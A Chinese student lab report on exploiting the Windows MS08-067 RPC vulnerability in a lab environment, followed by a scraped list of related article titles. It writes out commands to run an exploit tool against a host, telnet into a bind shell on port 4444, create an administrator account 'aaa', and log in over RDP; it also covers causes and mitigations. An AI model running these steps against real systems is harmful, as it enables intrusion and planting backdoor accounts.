一、实验目的及要求

1. 掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。

二、实验设备(环境)及要求

PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.进入”c:\tools\MS08067利用方法”的目录

2.输入“MS08067.exe”,显示工具使用方法

3.输入“MS08067.exe 192.168.1.3”,向远程主机192.168.1.3发送一串特殊构造的数据包,使目标主机内存溢出,程序跳转到shellcode代码处执行,shellcode代码在目标主机上开启4444端口,等待连接。

4.输入命令“telnet 192.168.1.3 4444”,进行连接。

5.用ipconfig命令查看当前ip

6.输入“net user aaa 123456 /add”,新建用户aaa

7.输入命令“net localgroup administrators aaa /add”,将aaa添加到管理员组

8.输入命令“netstat -an”查看远程主机开放端口,发现3389已经打开。

9.使用aaa账户进行远程登陆

四、实验结果与数据处理

   1.显示MS08067使用方法

2.使用工具进行内存溢出

3.telnet连接成功,查看目的ip

4.创建aaa用户并让其加入管理员组

5.查看3389端口开启情况

6.使用aaa远程登陆192.168.1.3

五、分析与讨论

通过这个实验,MS08067漏洞产生的原因:由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。

防护:打上补丁,将Computer Browser、Server、Workstation这三个系统服务关闭,毕竟这三个服务在大多数情况下是用不到的。同时,为了防止以后RPC又出现什么漏洞,最好是安装防火墙,关闭本机的445端口

MS08067利用方法相关推荐

  1. PHP文件包含漏洞原理分析和利用方法

    本文章简单摘要:一.涉及到的危险函数[include(),require()和include_once(),require_once()]include()&&require()语句: ...

  2. 【转载】Mysql注入点在limit关键字后面的利用方法

    描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景. 细节 在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL ...

  3. 被玩坏的IE浏览器——漏洞利用方法和技巧介绍

    0x01 基本介绍 自1995年以来,Internet Explorer一直是Microsoft Windows操作系统的核心部分.尽管正式停止了对Edge浏览器的进一步开1发,但由于其持续使用的情况 ...

  4. php命令执行后门,phpstudy后门利用方法及getshell

    0x01 phpstudy利用方法请求任意后缀为php的文件 目标环境为php5.2,5.4,且不能为nts 存在Accept-Encoding: gzip,deflate 此处填写base64加密后 ...

  5. C#利用方法重载实现2个整数,2个双精度数,3个整数中求最大值。由于设计了方法重载,系统会根据调用方法时传递的实参类型和个数而自动选择相应的方法来求最大数。

    1.题目要求如下: C#利用方法重载实现2个整数,2个双精度数,3个整数中求最大值.由于设计了方法重载,系统会根据调用方法时传递的实参类型和个数而自动选择相应的方法来求最大数. 2.来吧展示,代码如下 ...

  6. 海岛大亨6图像处理错误_《海岛大亨6》bug有效利用方法 一般人我不告诉他

    这个游戏大家都玩过,但是很多玩家不知道<海岛大亨6>中bug怎么利用,其实小编一开始也不知道这个.今天牛游网小编就给大家分享一下<海岛大亨6>bug有效利用方法分享,希望大家能 ...

  7. XXE漏洞漏洞及利用方法解析

    XXE(XML External Entity Injection)即XML外部实体类注入漏洞.XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取. ...

  8. weblogic修改banner_WEBLogic默认账号弱口令及利用方法.doc

    WEBLogic默认账号弱口令及利用方法 WEBLogic默认账号弱口令的利用方法 文章引用作者:Mickey [I.S.T.O.]&hackest [H.S.T.] 发表在<黑客X档案 ...

  9. Sql Injection脚本注入终极利用方法

    本文仅用于教学目的,如果因为本文造成的***后果本人概不负责.因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作. 考虑再 ...

  10. 僵尸网络中区块链的利用方法分析

    一.基于区块链的CC服务器地址/命令隐藏方法 (一)通过交易金额隐藏CC地址 Redaman:   将Pony C&C服务器隐藏在比特币区块链中.主要思想为将服务器IP进行转换,通过转账的方式 ...

最新文章

  1. 2022-2028年中国K酸行业发展现状及前瞻分析报告
  2. 一起学nRF51xx 9 -  pwm
  3. oracle易忘函数用法(6)
  4. php mysql管理_MySQL 连接与管理
  5. Java8中接口的新特性
  6. 服务器系统事件报错4103,IIS信息服务器排错指导
  7. Style后台动态定义[转]
  8. Springboot2.0从零开始搭建脚手架-初始化和整合MybatisPlus3.0+...
  9. Android 7.1 亮度调节之BrightnessController
  10. 联想笔记本linux不能启动无线网卡解决方法
  11. Python爬虫—爬取小说名著
  12. mysql常见函数面试题_MySql三到常见面试题,整理总结一下
  13. nginx 301 将不带www域名,重定向到www域名
  14. 硬件基础知识(9)---电容容量、尺寸及作用
  15. 黑龙江第三方软件测试机构 CMA/CNAS双资质
  16. 论文笔记--Fine-Grained Service-Level Passenger Flow Prediction for Bus Transit Systems
  17. 计算机应用基础课是干嘛的,《计算机应用基础》课程简介
  18. jQuery EasyUI 1.9.4中文参考手册 离线chm格式
  19. html页面向上移动标签,HTML学习笔记☆移动标签
  20. MAStudio三步打造移动OA系统开发生态链

热门文章

  1. Blender学习笔记:齿轮模型建立
  2. python-定义类的属性
  3. android获取显示屏尺寸大小,Android 屏幕各尺寸的获取
  4. win10 系统下CAD2009缩放卡顿问题解决
  5. 手机app测试点有哪些?手机app测试用例怎么写?错过绝对后悔!
  6. 亚马逊美国站店铺fbm自发货流程是什么?亚马逊美国站店铺fbm如何做起来?
  7. Sentaurus TCAD Inspect
  8. php随机生成昵称,PHP随机生成姓名的方法介绍
  9. python打印图像所有的像素值
  10. 计算机网络知识点汇总(考研用)